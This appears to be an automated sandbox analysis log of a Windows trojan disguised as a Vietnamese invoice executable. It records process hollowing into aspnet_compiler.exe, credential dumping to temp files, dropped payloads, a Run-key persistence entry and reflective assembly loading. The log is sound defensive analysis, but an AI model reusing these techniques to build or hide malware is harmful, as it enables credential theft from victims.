              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgi0vwrh.uo4.ps1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,14_2_00418758
              Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, aspnet_compiler.exe, 0000000F.00000002.365717220.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: aspnet_compiler.exe, 0000000E.00000003.395805879.0000000002755000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.418724773.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.444163305.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.475835052.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.500353883.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.511362644.0000000000A53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,14_2_00413D4C
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-E9KXT7
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 28.2.Shhejayly.exe.36c99b0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.7bd0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.7bd0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.543466399.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.542998195.0000000002653000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.355179401.0000000002596000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.600053448.0000000007BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.551264239.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwn.exe PID: 2088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Shhejayly.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Shhejayly.exe PID: 5608, type: MEMORYSTR
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, Form1.cs.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: Shhejayly.exe.0.dr, Form1.cs.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 0.0.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.180000.0.unpack, Form1.cs.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: Cuhcxlcg[1].exe.12.dr, Form1.cs.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: dwn.exe.12.dr, Form1.cs.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 17.0.dwn.exe.ae0000.0.unpack, Form1.cs.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E357F push esi; retf 0_2_077E3582
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E3DAE push ds; ret 0_2_077E3DBA
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077EAC8A push E8000001h; retf 0_2_077EAC91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10002806 push ecx; ret 12_2_10002819
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E002 push edx; retf 14_2_0044E07A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E002 push edx; retf 14_2_0044E0BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E0C8 push edx; retf 14_2_0044E0CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E0B4 push edx; retf 14_2_0044E0BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E0B0 push eax; retf 14_2_0044E0B2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E144 push ebp; iretd 14_2_0044E146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E148 push esp; iretd 14_2_0044E152
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E17C push ecx; retf 14_2_0044E142
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E130 push edi; retf 14_2_0044E136
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E138 push ecx; retf 14_2_0044E142
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044E1C4 push eax; retf 14_2_0044E1C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044693D push ecx; ret 14_2_0044694D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00451D54 push eax; ret 14_2_00451D61
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: 0xB7B87B95 [Sun Sep 4 00:13:09 2067 UTC]
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exeJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Temp\dwn.exeJump to dropped file
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeJump to dropped file
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ShhejaylyJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ShhejaylyJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
